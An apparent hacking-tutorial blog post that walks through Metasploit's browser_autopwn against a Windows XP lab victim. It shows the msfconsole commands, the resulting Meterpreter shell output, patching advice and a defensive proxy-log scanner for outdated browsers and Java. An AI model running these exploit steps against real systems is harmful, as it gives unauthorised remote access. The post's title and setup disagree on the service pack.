metalkey

Hacking tutorials + info

Metasploit Browser Autopwn – Windows XP SP2

July 01, 2016 — metalkey

Attacker: Kali Linux
Victim: Windows XP SP3 (Java 6u25, IE6)

Step 1 – Starting the Browser Autopwn Server

Run msfconsole, load the browser_autopwn module and set all required options.

root@kali:~$ msfconsole
msf > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > set LHOST 192.168.1.12
msf auxiliary(browser_autopwn) > set SRVPORT 80
msf auxiliary(browser_autopwn) > set URIPATH /
msf auxiliary(browser_autopwn) > run

[*] Starting exploit modules on host 192.168.1.12...
[*] Server started.

The Browser Autopwn server is now running and waiting for victims to browse to the URL http://192.168.1.12.

Step 2 – Pwning the Victim

On your Windows XP test machine (victim), browse to http://192.168.1.12.
This will trigger the browser_autopwn module to serve the appropriate exploit and launch a Meterpreter session.

[*] Meterpreter session 1 opened (192.168.1.12:7777 -> 192.168.1.13:1045) at 2015-07-25 05:08:06 -0400
...
msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\IEUser\Desktop>echo %USERNAME%
Victim

C:\Documents and Settings\IEUser\Desktop>ipconfig
Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : Home
IP Address. . . . . . . . . . . . : 192.168.1.13
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1

C:\Documents and Settings\IEUser\Desktop>

You now have shell access to the Windows XP SP3 victim, with the same privileges as the user who navigated to the exploit URL.

Solution

Keep your software fully updated (e.g. Windows, web browsers, Java) and uninstall unused applications.
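
As an added example (not from the original post), the following sketch applies this advice from the defender's side: it scans web-proxy log lines for User-Agent strings that reveal an outdated client stack like the victim in this walkthrough (IE6, Windows XP, Java 6u25). The log lines are constructed, and the minimum-version baselines are assumptions to be replaced with your own patch policy.

```python
import re
from collections import defaultdict

# Constructed sample proxy log lines in "combined" format (not real traffic).
SAMPLE_LOG = '''\
192.168.1.13 - - [25/Jul/2015:05:07:58 -0400] "GET http://intranet.example/ HTTP/1.1" 200 512 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
192.168.1.13 - - [25/Jul/2015:05:08:01 -0400] "GET http://intranet.example/tool.jar HTTP/1.1" 200 9000 "-" "Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_25"
192.168.1.20 - - [25/Jul/2015:05:09:10 -0400] "GET http://intranet.example/ HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0"
'''

LINE_RE = re.compile(r'^(\S+) .*"([^"]*)"\s*$')  # client IP, last quoted field (User-Agent)
MSIE_RE = re.compile(r'MSIE (\d+)\.')             # Internet Explorer major version
NT_RE = re.compile(r'Windows NT (\d+)\.(\d+)')    # NT 5.1 is Windows XP
JAVA_RE = re.compile(r'\bJava/(\d+)\.(\d+)\.(\d+)(?:_(\d+))?')  # e.g. Java/1.6.0_25

# Assumed policy baselines (hypothetical values; set them from your own patch standard).
MIN_MSIE, MIN_NT, MIN_JAVA = 11, (10, 0), (1, 8, 0, 0)

def findings_for_agent(ua):
    """Return the outdated components advertised by one User-Agent string."""
    out = []
    m = MSIE_RE.search(ua)
    if m and int(m.group(1)) < MIN_MSIE:
        out.append(f"Internet Explorer {m.group(1)}")
    m = NT_RE.search(ua)
    if m and (int(m.group(1)), int(m.group(2))) < MIN_NT:
        out.append(f"Windows NT {m.group(1)}.{m.group(2)}")
    m = JAVA_RE.search(ua)
    if m:
        ver = tuple(int(g or 0) for g in m.groups())  # missing update number counts as 0
        if ver < MIN_JAVA:
            out.append(f"Java {ver[0]}.{ver[1]}.{ver[2]}_{ver[3]:02d}")
    return out

def outdated_clients(log_text):
    """Map each client IP to the sorted list of outdated components it was seen using."""
    hosts = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:  # skip lines that are not in the expected format
            hosts[m.group(1)].update(findings_for_agent(m.group(2)))
    return {ip: sorted(f) for ip, f in hosts.items() if f}

if __name__ == "__main__":
    for ip, items in outdated_clients(SAMPLE_LOG).items():
        print(ip, "->", ", ".join(items))
```

User-Agent strings can be changed by the client, so treat the result as a lead for patch inventory rather than as an authoritative software census.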
